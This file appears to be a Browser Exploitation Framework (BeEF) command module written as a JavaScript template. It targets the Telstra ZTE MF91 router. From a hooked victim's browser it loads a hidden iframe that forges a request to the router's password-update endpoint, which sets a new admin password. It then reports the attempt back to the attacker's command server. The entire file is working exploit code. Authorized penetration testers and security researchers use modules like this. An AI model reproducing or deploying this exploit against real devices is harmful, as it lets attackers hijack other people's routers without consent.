beef.execute(function() {
var rhost = '<%= @rhost %>';
var password = '<%= @password %>';
var timeout = 15;
var telstra_zte_mf91_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
telstra_zte_mf91_iframe_<%= @command_id %>.setAttribute('src', 'http://'+rhost+'/goform/upd_pwd?password='+password);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(telstra_zte_mf91_iframe_<%= @command_id %>);
}
setTimeout("cleanup()", timeout*1000);
});